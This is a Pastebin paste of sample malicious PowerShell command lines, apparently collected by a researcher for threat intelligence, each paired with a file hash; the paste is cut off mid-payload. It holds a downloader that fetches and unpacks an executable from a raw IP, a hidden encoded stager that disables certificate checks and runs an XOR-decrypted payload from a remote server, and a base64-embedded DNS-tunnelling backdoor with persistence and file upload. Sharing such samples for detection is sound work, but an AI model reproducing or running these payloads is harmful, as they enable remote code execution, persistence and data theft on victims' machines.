SHARE
TWEET

Example Powershell payloads from @JohnLaTwC

a guest Sep 14th, 2016 1,883 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ###:BEGIN prepared by @JohnLaTwC
  2. C:\Windows\System32\cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.Webclient).DownloadFile('http://151.80.237.220/1.zip','C:\Users\User1\AppData\Roaming\WndUpdate\1.exe.zip'); (new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\').CopyHere((new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\1.exe.zip').Items(),16)
  3. 271f9ddefb620828a74fe2fb6794a8bbdab25078d06a0efe8f93f6d99b95b81e
  4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -NoP -sta -NonI -W Hidden -Enc JAB3AGMAPQBOAEUAVwAtAE8AQgBKAEUAYwBUACAAUwBZAHMAdABlAE0ALgBOAGUAdAAuAFcAZQBiAEMATABpAEUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAkAHcAQwAuAEgAZQBhAGQAZQBSAFMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAUgBvAFgAeQAgAD0AIABbAFMAWQBzAFQAZQBNAC4ATgBFAFQALgBXAEUAYgBSAEUAUQBVAGUAUwBUAF0AOgA6AEQARQBmAGEAVQBsAFQAVwBFAEIAUABSAE8AeAB5ADsAJAB3AEMALgBQAFIATwBYAFkALgBDAFIAZQBEAGUAbgBUAEkAYQBMAFMAIAA9ACAAWwBTAHkAUwB0AEUATQAuAE4ARQB0AC4AQwBSAGUARABFAG4AVABJAGEATABDAEEAQwBIAEUAXQA6ADoARABFAGYAQQB1AEwAdABOAGUAVAB3AE8AcgBLAEMAUgBFAGQAZQBOAFQASQBBAGwAUwA7ACQASwA9ACcAUABPAFQAQQBUAE8AUABPAFQAQQBUAE8AUABPAFQAQQBUAE8AUABPAFQAQQBUAE8AJwA7ACQAaQA9ADAAOwBbAGMASABBAFIAWwBdAF0AJABCAD0AKABbAGMASABhAFIAWwBdAF0AKAAkAFcAYwAuAEQAbwB3AG4ATABvAGEAZABTAFQAUgBpAE4AZwAoACIAaAB0AHQAcABzADoALwAvADUANAAuADEANgA1AC4AMQAxADcALgAyADMAMgA6ADQANAAzAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBiAFgATwBSACQAawBbACQASQArACsAJQAkAGsALgBMAGUATgBnAHQASABdAH0AOwBJAEUAWAAgACgAJABiAC0AagBvAEkATgAnACcAKQA= --> $wc=NEW-OBJEcT SYsteM.Net.WebCLiENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wC.HeadeRS.Add('User-Agent',$u);$wc.PRoXy = [SYsTeM.NET.WEbREQUeST]::DEfaUlTWEBPROxy;$wC.PROXY.CReDenTIaLS = [SyStEM.NEt.CReDEnTIaLCACHE]::DEfAuLtNeTwOrKCREdeNTIAlS;$K='POTATOPOTATOPOTATOPOTATO';$i=0;[cHAR[]]$B=([cHaR[]]($Wc.DownLoadSTRiNg("https://54.165.117.232:443/index.asp")))|%{$_-bXOR$k[$I++%$k.LeNgtH]};IEX ($b-joIN'')
  5. 2897729dc0243f7066daa4f679bcd5a18bc4a08d37a14c7e67bf9437c8b269c9
  6. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "  &{ $f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN0KCJ3U2NyaXB0LlNoZWxsIikNCg0KSE9NRSA9ICIldXNlcnByb2ZpbGUlXEFwcERhdGFcTG9jYWxcTWljcm9zb2Z0XE1lZGlhXCINCg0KDQpkbnNDbWQgPSAicG93ZXJzaGVsbCAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtZmlsZSAiICYgSE9NRSAmICJkbi5wczEiDQoNCndzcy5SdW4gZG5zQ21kLDANCg0KDQoNCg==')); Add-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\upd.vbs' $f;  $fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCAkTXlJbnZvY2F0aW9uLk15Q29tbWFuZC5EZWZpbml0aW9uDQokR2xvYmFsOmRvbWFpbiA9ICJnb29nbGVkbnN1cGRhdGUudGsiDQokR2xvYmFsOklEID0gIkExIg0KJEdsb2JhbDpkRm9sZCA9ICRzY3JpcHRkaXIgKyAiXGRuIg0KJEdsb2JhbDp1Rm9sZCA9ICRzY3JpcHRkaXIgKyAiXHVwIg0KJEdsb2JhbDp0Rm9sZCA9ICRzY3JpcHRkaXIgKyAiXHRlIg0KJEdsb2JhbDpob3N0TGVuID0gMTANCiRHbG9iYWw6cmVnRXhpc3QgPSAwDQokR2xvYmFsOmJhdEV4aXN0ID0gMA0KaXBjb25maWcgL2ZsdXNoZG5zDQpGdW5jdGlvbiBJSWYoJElmLCAkUmlnaHQsICRXcm9uZykge0lmICgkSWYpIHskUmlnaHR9IEVsc2UgeyRXcm9uZ319DQpmdW5jdGlvbiBETlNSZXF1ZXN0DQp7DQogICAgcGFyYW0oIFtzdHJpbmddJGhvc3RuYW1lICkNCiAgICAkU3RvcGxvb3AgPSAkZmFsc2UNCiAgICBbaW50XSRSZXRyeWNvdW50ID0gIjAiDQogICAgJHJldCA9IFtTeXN0ZW0uTmV0LklQQWRkcmVzc1tdXSgiMC4wLjAuMCIpDQogICAgJHN1Y2Nlc3MgPSAkZmFsc2UNCiAgICBkb3sNCiAgICAgICAgdHJ5ew0KICAgICAgICAgICAgJHJldCA9IFtTeXN0ZW0uTmV0LklQQWRkcmVzc1tdXVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGhvc3RuYW1lKQ0KICAgICAgICAgICAgJFN0b3Bsb29wID0gJHRydWUNCiAgICAgICAgICAgICRzdWNjZXNzID0gJHRydWUNCiAgICAgICAgfQ0KICAgICAgICBjYXRjaHsNCiAgICAgICAgICAgICRzdWNjZXNzID0gJGZhbHNlDQogICAgICAgICAgICBpZiAoJFJldHJ5Y291bnQgLWd0IDIwKXsNCgkJCSAgICANCgkJCSAgICAkU3RvcGxvb3AgPSAkdHJ1ZQ0KICAgICAgICAgICAgICAgIHRocm93DQoJCSAgICB9DQoJCSAgICBlbHNlIHsJCQkNCgkJCSAgICBTdGFydC1TbGVlcCAtU2Vjb25kcyAyDQoJCQkgICAgJFJldHJ5Y291bnQgPSAkUmV0cnljb3VudCArIDENCgkJICAgIH0NCiAgICAgICAgfQ0KICAgIH0NCiAgICB3aGlsZSgkU3RvcGxvb3AgLWVxICRmYWxzZSkNCiAgICByZXR1cm4gJHJldA0KfQ0KZnVuY3Rpb24gZG93bmlwDQp7DQogcGFyYW0oIFtpbnRdJHR5cGUgKQ0KICRmaW5pc2hlZCA9IDANCiAkZmlsZW5hbWUgPSAiIg0KICRmaWxlSUQgPSAwDQogJHJlcVN0ciA9ICJJRiIgDQogDQogJGhvc3RuYW1lID0gJHJlcVN0clskdHlwZV0gKyAkR2xvYmFsOklEICsgKC1qb2luICgoNjUuLjkwKSArICg0OC4uNTcpICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMiB8ICUge1tjaGFyXSRffSkpICsgIi4iICsgJEdsb2JhbDpkb21haW4gDQogJGlwQWRkeSA9IChbU3lzdGVtLk5ldC5JUEFkZHJlc3NbXV0oRE5TUmVxdWVzdCAkaG9zdG5hbWUpKVswXS5HZXRBZGRyZXNzQnl0ZXMoKQ0KIA0KIA0KIA0KIGlmICgoJGlwQWRkeVswXSAtZXEgJGlwQWRkeVsxXSkgLWFuZCAoJGlwQWRkeVswXSAtZXEgNjMpKQ0KIHsNCiAgICANCiAgICAkZmlsZUlEID0gW2NoYXJdJGlwQWRkeVsyXSArIFtjaGFyXSRpcEFkZHlbM10NCiAgICANCiAgICANCiAgICAkZmluaXNoZWRGaWxlTmFtZSA9IFtpbnRdMA0KICAgICRuYW1lUGFydCA9IFtpbnRdMA0KICAgIHdoaWxlKCRmaW5pc2hlZEZpbGVOYW1lIC1lcSAwKXsNCiAgICAgICAgJGhvc3RuYW1lID0gIlAiICsgJGZpbGVJRCArIFtzdHJpbmddJG5hbWVQYXJ0ICsgICgtam9pbiAoKDY1Li45MCkgKyAoNDguLjU3KSArICg5Ny4uMTIyKXwgR2V0LVJhbmRvbSAtQ291bnQgMiB8ICUge1tjaGFyXSRffSkpICsgIi4iICArICRHbG9iYWw6ZG9tYWluICAgICAgICANCiAgICAgICAgJGlwRmlsZU5hbWVBZGRyID0gKFtTeXN0ZW0uTmV0LklQQWRkcmVzc1tdXShETlNSZXF1ZXN0ICRob3N0bmFtZSkpWzBdLkdldEFkZHJlc3NCeXRlcygpDQogICAgICAgIA0KICAgICAgICBpZiAoJGlwRmlsZU5hbWVBZGRyWzBdIC1lcSA2OCkNCiAgICAgICAgeyAgIA0KICAgICAgICAgICAgaWYgKCgkaXBGaWxlTmFtZUFkZHJbMV0gLWVxIDEyNykgLW9yICgkaXBGaWxlTmFtZUFkZHJbMl0gLWVxIDEyNykgLW9yICgkaXBGaWxlTmFtZUFkZHJbM10gLWVxIDEyNykpew0KICAgICAgICAgICAgICAgICRmaW5pc2hlZEZpbGVOYW1lID0gW2ludF0xIA0KICAgICAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICRmaWxlbmFtZSA9ICRmaWxlbmFtZSArIChJSWYgKCRpcEZpbGVOYW1lQWRkclsxXSAtbmUgMTI3KSAoW2NoYXJdJGlwRmlsZU5hbWVBZGRyWzFdKSAiIikgKyAoSUlmICgkaXBGaWxlTmFtZUFkZHJbMl0gLW5lIDEyNykgKFtjaGFyXSRpcEZpbGVOYW1lQWRkclsyXSkgIiIpICsgKElJZiAoJGlwRmlsZU5hbWVBZGRyWzNdIC1uZSAxMjcpIChbY2hhcl0kaXBGaWxlTmFtZUFkZHJbM10pICIiKQ0KICAgICAgICAgICAgJG5hbWVwYXJ0ID0gW2ludF0kbmFtZVBhcnQgKyBbaW50XTENCiAgICAgICAgfQ0KICAgICAgICANCiAgICB9DQogICAgDQogICAgDQogICAgJGZpbmlzaGVkRGF0YSA9IFtpbnRdMA0KICAgICRmc2l6ZSA9IFtpbnRdMA0KICAgICR0ZW1wRmlsZVBhdGggPSAgKCRHbG9iYWw6dEZvbGQpICsgIlwiICsgJGZpbGVuYW1lDQogICAgDQogICAgd2hpbGUoJGZpbmlzaGVkRGF0YSAtZXEgMCl7DQogICAgICAgIA0KICAgICAgICAkZmlsZUhkbCA9IFtpby5maWxlXTo6T3BlbigkdGVtcEZpbGVQYXRoLCJBcHBlbmQiKTsNCiAgICAgICAgJGhvc3RuYW1lID0gIkQiICsgJGZpbGVJRCArICgtam9pbiAoKDY1Li45MCkgKyAoNDguLjU3KSArICg5Ny4uMTIyKXwgR2V0LVJhbmRvbSAtQ291bnQgMiB8ICUge1tjaGFyXSRffSkpICsgKChbc3RyaW5nXShteWJhc2UzMlVJbnQzMiAoR2V0LUl0ZW0gJHRlbXBGaWxlUGF0aCkubGVuZ3RoKSkuUmVtb3ZlKDAsMikuUmVtb3ZlKDUsMSkpICArICIuIiArICRHbG9iYWw6ZG9tYWluIA0KICAgICAgICAoW1N5c3RlbS5OZXQuSVBBZGRyZXNzW11dKEROU1JlcXVlc3QgJGhvc3RuYW1lKSkuR2V0RW51bWVyYXRvcigpfCBTb3J0LU9iamVjdCBhZGRyZXNzIHwgZm9yZWFjaHsNCiAgICAgICAgICAgIA0KICAgICAgICAgICAgDQogICAgICAgICAgICBpZiAoW2ludF0kXy5HZXRBZGRyZXNzQnl0ZXMoKVswXSAtZ3QgMTMwKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICRzZXF1ZW5jZUluZGV4ID0gW2ludF0kXy5HZXRBZGRyZXNzQnl0ZXMoKVswXSAtIDI0MCAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgaWYgKFtpbnRdJF8uR2V0QWRkcmVzc0J5dGVzKClbMV0gLW5lIDEyNyl7DQogICAgICAgICAgICAgICAgICAgICRmaWxlSGRsLldyaXRlQnl0ZSgkXy5HZXRBZGRyZXNzQnl0ZXMoKVsxXSkgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICBpZiAoW2ludF0kXy5HZXRBZGRyZXNzQnl0ZXMoKVsyXSAtbmUgMTI3KXsNCiAgICAgICAgICAgICAgICAgICAgJGZpbGVIZGwuV3JpdGVCeXRlKCRfLkdldEFkZHJlc3NCeXRlcygpWzJdKQ0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICBpZiAoW2ludF0kXy5HZXRBZGRyZXNzQnl0ZXMoKVszXSAtbmUgMTI3KXsNCiAgICAgICAgICAgICAgICAgICAgJGZpbGVIZGwuV3JpdGVCeXRlKCRfLkdldEFkZHJlc3NCeXRlcygpWzNdKQ0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICBpZiAoW2ludF0kXy5HZXRBZGRyZXNzQnl0ZXMoKVszXSAtZXEgMTI3KXsgDQogICAgICAgICAgICAgICAgICAgICRmaW5pc2hlZERhdGEgPSAxDQogICAgICAgICAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgJGZpbGVIZGwuQ2xvc2UoKQ0KICAgIH0gICAgDQogICAgJGI2NERhdGEgPSBbU3lzdGVtLklPLkZpbGVdOjpSZWFkQWxsQnl0ZXMoJHRlbXBGaWxlUGF0aCkNCiAgICAkZGF0YSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRDaGFyQXJyYXkoJGI2NERhdGEsMCwkYjY0RGF0YS5MZW5ndGgpIA0KICAgICRmaWxlUGF0aCA9ICAoJEdsb2JhbDpkRm9sZCkgKyAiXCIgKyAkZmlsZW5hbWUNCiAgICBbaW8uZmlsZV06OldyaXRlQWxsQnl0ZXMoJGZpbGVQYXRoLCRkYXRhKQ0KICAgIGRlbCAkdGVtcEZpbGVQYXRoDQogICAgcmV0dXJuICRmaWxlbmFtZQ0KIH0NCiANCiByZXR1cm4gJGZpbGVuYW1lDQp9DQpmdW5jdGlvbiB1cGlwDQp7DQogICAgcGFyYW0oIFtzdHJpbmddJGZuYW1lICkNCiAgICANCiAgICAkZmlsZVBhdGggPSAoJEdsb2JhbDp0Rm9sZCkgKyAiXCIgKyAkZm5hbWUNCiAgICAkc3VjY2VzcyA9IDANCiAgICANCiAgICAkaG9zdG5hbWUgPSAiWSIgKyAkR2xvYmFsOklEICsgKC1qb2luICgoNjUuLjkwKSArICg0OC4uNTcpICsgKDk3Li4xMjIpfCBHZXQtUmFuZG9tIC1Db3VudCAyIHwgJSB7W2NoYXJdJF99KSkrICRmbmFtZS5SZXBsYWNlKCIuIiwiIikgICsgIi4iICsgJEdsb2JhbDpkb21haW4gDQogICAgDQogICAgJHJlc3BCeXRlcyA9IChbU3lzdGVtLk5ldC5JUEFkZHJlc3NbXV0oRE5TUmVxdWVzdCAkaG9zdG5hbWUpKVswXS5HZXRBZGRyZXNzQnl0ZXMoKQ0KICAgIA0KICAgIGlmICgoJHJlc3BCeXRlc1swXSAtZXEgJHJlc3BCeXRlc1sxXSkgLWFuZCAoJHJlc3BCeXRlc1swXSAtZXEgW2J5dGVdNzQpKQ0KICAgIHsNCiAgICAgICAgJHVwbG9hZElEID0gW2NoYXJdJHJlc3BCeXRlc1syXSArIFtjaGFyXSRyZXNwQnl0ZXNbM10NCiAgICAgICAgDQogICAgICAgIA0KICAgICAgICAkdXBsb2FkZWRDb21wbGV0ZVNpemUgPSBbdWludDMyXTANCiAgICAgICAgJGZpbGVEYXRhID0gKGdldC1jb250ZW50ICRmaWxlUGF0aCAtZW5jb2RpbmcgYnl0ZSkNCiAgICAgICAgJGJhc2UzMmZpbGVkYXRhID0gKGJhc2UzMmRhdGEgJGZpbGVEYXRhKQ0KICAgICAgICB3aGlsZSgkdXBsb2FkZWRDb21wbGV0ZVNpemUgLWx0ICRiYXNlMzJmaWxlZGF0YS5sZW5ndGgpDQogICAgICAgIHsNCiAgICAgICAgICAgIA0KICAgICAgICAgICAgDQogICAgICAgICAgICAkaG9zdG5hbWUgPSAiUSIgKyAkdXBsb2FkSUQgKyAoW3N0cmluZ10obXliYXNlMzJVSW50MzIgJHVwbG9hZGVkQ29tcGxldGVTaXplKSkuUmVtb3ZlKDAsMikuUmVtb3ZlKDUsMSkgKyAoLWpvaW4gJGJhc2UzMmZpbGVkYXRhWyR1cGxvYWRlZENvbXBsZXRlU2l6ZS4uJCgkdXBsb2FkZWRDb21wbGV0ZVNpemUgKyAkR2xvYmFsOmhvc3RMZW4tOCldKSArICIuIiArICRHbG9iYWw6ZG9tYWluICAgICAgICAgICAgIA0KICAgICAgICAgICAgDQogICAgICAgICAgICAkcmVzcEJ5dGVzID0gKFtTeXN0ZW0uTmV0LklQQWRkcmVzc1tdXShETlNSZXF1ZXN0ICRob3N0bmFtZSkpWzBdLkdldEFkZHJlc3NCeXRlcygpDQogICAgICAgICAgICANCiAgICAgICAgICAgIGlmIChbaW50XSRyZXNwQnl0ZXNbMF0gLWVxIDc1KQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICR1cGxvYWRlZENvbXBsZXRlU2l6ZSA9IFt1aW50MzJdKCRyZXNwQnl0ZXNbM10rJHJlc3BCeXRlc1syXSoxMDArJHJlc3BCeXRlc1sxXSoxMDAwMCkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSAgICAgDQogICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgJGhvc3RuYW1lID0gIloiICsgJHVwbG9hZElEICsgKC1qb2luICgoNjUuLjkwKSArICg0OC4uNTcpICsgKDk3Li4xMjIpfCBHZXQtUmFuZG9tIC1Db3VudCAyIHwgJSB7W2NoYXJdJF99KSkgICsgIi4iICsgJEdsb2JhbDpkb21haW4gDQogICAgICAgICRyZXNwQnl0ZXMgPSAoW1N5c3RlbS5OZXQuSVBBZGRyZXNzW11dKEROU1JlcXVlc3QgJGhvc3RuYW1lKSlbMF0uR2V0QWRkcmVzc0J5dGVzKCkNCiAgICAgICAgDQogICAgICAgIGlmICgoW2ludF0kcmVzcEJ5dGVzWzBdIC1lcSA3NikgLWFuZCAoW2ludF0kcmVzcEJ5dGVzWzFdIC1lcSA3NikgLWFuZCAoW2ludF0kcmVzcEJ5dGVzWzJdIC1lcSA3NikgLWFuZCAoW2ludF0kcmVzcEJ5dGVzWzNdIC1lcSA3NikpDQogICAgICAgIHsNCiAgICAgICAgICAgIGRlbCAkZmlsZVBhdGgNCiAgICAgICAgICAgIHJldHVybiAiT0siDQogICAgICAgIH0NCiAgICB9DQp9DQpmdW5jdGlvbiBteVRvVWludDY0DQp7DQogICAgcGFyYW0oIFtieXRlW11dJGRhdGEgKSAgICAgIA0KICAgICRyZXRVaW50ID0gW3VpbnQ2NF0wDQogICAgJHBvd0NvdW50ID0gW2ludF0wDQogICAgZm9yKCRsZW49KCRkYXRhLkxlbmd0aC0xKTsgJGxlbiAtZ2UgMDsgJGxlbi0tKQ0KICAgIHsNCiAgICAgICAgJHJldFVpbnQgPSAkcmV0VWludCArICRkYXRhWyRsZW5dICogW01hdGhdOjpQb3coMTYsJHBvd0NvdW50KQ0KICAgICAgICAkcG93Q291bnQgPSAkcG93Q291bnQgKyAyOyAgICAgICAgDQogICAgfSAgICANCiAgICByZXR1cm4gJHJldFVpbnQNCn0NCmZ1bmN0aW9uIGJhc2UzMmRhdGENCnsNCiAgICBwYXJhbSggW2J5dGVbXV0kZGF0YSApICAgIA0KICAgICRyZXQgPSAiIg0KICAgIGlmICgkZGF0YS5MZW5ndGggLWVxIDApIHsgcmV0dXJuIHJldH0NCiAgICAkY2hhcm1hcCA9ICJhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NSINCiAgICAgICAgDQogICAgDQogICAgZm9yICgkZml2ZUJ5dGVJbmRleCA9IDA7JGZpdmVCeXRlSW5kZXggLWx0ICBbTWF0aF06OkNlaWxpbmcoJGRhdGEuTGVuZ3RoLzUpOyAkZml2ZUJ5dGVJbmRleCsrKSAjDQogICAgew0KICAgICAgICANCiAgICAgICAgJGJ5dGVzID0gW2J5dGVbXV0kZGF0YVsoJGZpdmVCeXRlSW5kZXggKiA1KS4uKElJRiAoJGZpdmVCeXRlSW5kZXggLWx0ICgkZGF0YS5MZW5ndGgvNSkpICgoJGZpdmVCeXRlSW5kZXgqNSkrNCkgICgkZGF0YS5MZW5ndGgtMSkpXQ0KICAgICAgICANCiAgICAgICAgDQogICAgICAgICRudW1iZXIgPSAgbXlUb1VpbnQ2NCAkYnl0ZXMNCiAgICAgICAgDQogICAgICAgICRwYWRkaW5nQml0UmVxdWlyZSA9ICg1IC0gKCgkYnl0ZXMuTGVuZ3RoICogOCkgJSA1KSkgJSA1IA0KICAgICAgICAkb3V0cHV0QjMyTGVuID0gKCRieXRlcy5MZW5ndGgqOCArICRwYWRkaW5nQml0UmVxdWlyZSkvNQ0KICAgICAgICANCiAgICAgICAgZm9yICgkcG93SW5kZXggPSAoJGJ5dGVzLkxlbmd0aCo4IC0gMSkgOyAkcG93SW5kZXggLWdlIDQ7ICRwb3dJbmRleCA9ICRwb3dJbmRleCAtIDUpDQogICAgICAgIHsgICAgICAgICANCiAgICAgICAgICAgICRyZXQgPSAkcmV0ICsgJGNoYXJtYXBbW01hdGhdOjpQb3coMiwoLTEgKiAkcG93SW5kZXggKyA0KSkqKCRudW1iZXIgLWJhbmQgW3VpbnQ2NF0oW01hdGhdOjpQb3coMiwkcG93SW5kZXgpICsgW01hdGhdOjpQb3coMiwkcG93SW5kZXgtMSkgKyBbTWF0aF06OlBvdygyLCRwb3dJbmRleC0yKSArIFtNYXRoXTo6UG93KDIsJHBvd0luZGV4LTMpICsgW01hdGhdOjpQb3coMiwkcG93SW5kZXgtNCkpKV0gICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgaWYgKCRwb3dJbmRleCAtZ2UgMCkgDQogICAgICAgIHsgICAgICAgICAgICANCiAgICAgICAgICAgIHN3aXRjaCAoJHBvd0luZGV4KQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIDAgeyRyZXQgPSAkcmV0ICsgJGNoYXJtYXBbJG51bWJlciAtYmFuZCBbdWludDY0XSgxKV0gKyAiNiJ9DQogICAgICAgICAgICAgICAgMSB7JHJldCA9ICRyZXQgKyAkY2hhcm1hcFskbnVtYmVyIC1iYW5kIFt1aW50NjRdKDMpXSArICI3In0NCiAgICAgICAgICAgICAgICAyIHskcmV0ID0gJHJldCArICRjaGFybWFwWyRudW1iZXIgLWJhbmQgW3VpbnQ2NF0oNyldICsgIjgifQ0KICAgICAgICAgICAgICAgIDMgeyRyZXQgPSAkcmV0ICsgJGNoYXJtYXBbJG51bWJlciAtYmFuZCBbdWludDY0XSgxNSldKyAiOSJ9DQogICAgICAgICAgICB9IA0KICAgICAgICB9ICAgICAgICAgICAgICANCiAgICB9DQogICAgcmV0dXJuICRyZXQgICAgICAgIA0KfQ0KZnVuY3Rpb24gbXliYXNlMzJVSW50MzINCnsNCiAgICBwYXJhbShbdWludDMyXSRpbnB1dG51bWJlcikNCiAgICAkcmV0ID0gIiINCiAgICAkYnl0ZXMgPSAoW2JpdGNvbnZlcnRlcl06OkdldEJ5dGVzKCRpbnB1dG51bWJlcikpDQogICAgW2FycmF5XTo6UmV2ZXJzZSgkYnl0ZXMpDQogICAgcmV0dXJuIChiYXNlMzJkYXRhICRieXRlcykNCn0NClRyeQ0Kew0KICAgIGlmKC1ub3QoVGVzdC1QYXRoIC1QYXRoICgkZ2xvYmFsOnVGb2xkKSkpew0KICAgICAgICBta2RpciAkZ2xvYmFsOnVGb2xkDQogICAgfQ0KICAgIGlmKC1ub3QgKFRlc3QtUGF0aCAtUGF0aCAoJGdsb2JhbDpkRm9sZCkpKXsNCiAgICAgICAgbWtkaXIgJGdsb2JhbDpkRm9sZA0KICAgIH0NCiAgICBpZigtbm90IChUZXN0LVBhdGggLVBhdGggKCRnbG9iYWw6dEZvbGQpKSl7DQogICAgICAgIG1rZGlyICRnbG9iYWw6dEZvbGQNCiAgICB9DQogICAgDQogICAgaWYgKChHZXQtSXRlbVByb3BlcnR5IC1QYXRoIEhLQ1U6XFNvZnR3YXJlXE1pY3Jvc29mdFxGVFAgLU5hbWUgSUQgIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlKSAtbmUgJG51bGwpDQogICAgew0KICAgICAgICAkR2xvYmFsOklEID0gKFtzdHJpbmddKChHZXQtSXRlbVByb3BlcnR5IC1QYXRoIEhLQ1U6XFNvZnR3YXJlXE1pY3Jvc29mdFxGVFAgLU5hbWUgSUQpLklEKSkuU3Vic3RyaW5nKDAsMikNCiAgICAgICAgDQogICAgfQ0KICAgIA0KICAgIGlmICgkR2xvYmFsOklEIC1lcSAiQTEiKQ0KICAgIHsNCiAgICAgICAgJGhvc3RuYW1lID0gIk4iICsgKC1qb2luICgoNjUuLjkwKSArICg0OC4uNTcpICsgKDk3Li4xMjIpfCBHZXQtUmFuZG9tIC1Db3VudCA1IHwgJSB7W2NoYXJdJF99KSkgICsgIi4iICsgJEdsb2JhbDpkb21haW4gICAgICAgICANCiAgICAgICAgJHJlc3BCeXRlcyA9IChbU3lzdGVtLk5ldC5JUEFkZHJlc3NbXV0oRE5TUmVxdWVzdCAkaG9zdG5hbWUpKVswXS5HZXRBZGRyZXNzQnl0ZXMoKQ0KICAgICAgICANCiAgICAgICAgaWYgKChbaW50XSRyZXNwQnl0ZXNbMF0gLWVxIDYxKSAtYW5kIChbaW50XSRyZXNwQnl0ZXNbMV0gLWVxIDYxKSkNCiAgICAgICAgew0KICAgICAgICAgICAgJEdsb2JhbDpJRCA9IFtjaGFyXSRyZXNwQnl0ZXNbMl0gKyBbY2hhcl0kcmVzcEJ5dGVzWzNdDQogICAgICAgICAgICBOZXctSXRlbVByb3BlcnR5IC1QYXRoICJIS0NVOlxTb2Z0d2FyZVxNaWNyb3NvZnRcRlRQIiAtTmFtZSAiSUQiIC1WYWx1ZSAkR2xvYmFsOklEIC1Qcm9wZXJ0eVR5cGUgU3RyaW5nIC1Gb3JjZQ0KICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICB9DQogICAgDQogICAgJGhvc3RuYW1lID0gIkMiICsgJEdsb2JhbDpJRCArICgtam9pbiAoKDY1Li45MCkgKyAoNDguLjU3KSArICg5Ny4uMTIyKXwgR2V0LVJhbmRvbSAtQ291bnQgMiB8ICUge1tjaGFyXSRffSkpICArICIuIiArICRHbG9iYWw6ZG9tYWluIA0KICAgICRyZXNwQnl0ZXMgPSAoW1N5c3RlbS5OZXQuSVBBZGRyZXNzW11dKEROU1JlcXVlc3QgJGhvc3RuYW1lKSlbMF0uR2V0QWRkcmVzc0J5dGVzKCkNCiAgICANCiAgICAgICAgICAgIA0KICAgIGlmICgoW2ludF0kcmVzcEJ5dGVzWzBdIC1lcSA2MikpDQogICAgew0KICAgICAgICAkR2xvYmFsOnJlZ0V4aXN0ID0gJHJlc3BCeXRlc1sxXQ0KICAgICAgICAkR2xvYmFsOmJhdEV4aXN0ID0gJHJlc3BCeXRlc1syXQ0KICAgICAgICAkR2xvYmFsOmhvc3RMZW4gID0gJHJlc3BCeXRlc1szXQ0KICAgICAgICANCiAgICB9DQogICAgDQogICAgJGhvc3RuYW1lID0gIlQiICsgJEdsb2JhbDpJRCArICgtam9pbiAoKDY1Li45MCkgKyAoNDguLjU3KSArICg5Ny4uMTIyKXwgR2V0LVJhbmRvbSAtQ291bnQgKCRHbG9iYWw6aG9zdExlbi0zKSB8ICUge1tjaGFyXSRffSkpICArICIuIiArICRHbG9iYWw6ZG9tYWluIA0KICAgICRyZXNwQnl0ZXMgPSAoW1N5c3RlbS5OZXQuSVBBZGRyZXNzW11dKEROU1JlcXVlc3QgJGhvc3RuYW1lKSlbMF0uR2V0QWRkcmVzc0J5dGVzKCkNCiAgICANCiAgICBpZiAoKFtpbnRdJHJlc3BCeXRlc1swXSAtbmUgNjUpIC1vciAoW2ludF0kcmVzcEJ5dGVzWzFdIC1uZSA2NSkgLW9yIChbaW50XSRyZXNwQnl0ZXNbMl0gLW5lIDY1KSAtb3IgKFtpbnRdJHJlc3BCeXRlc1szXSAt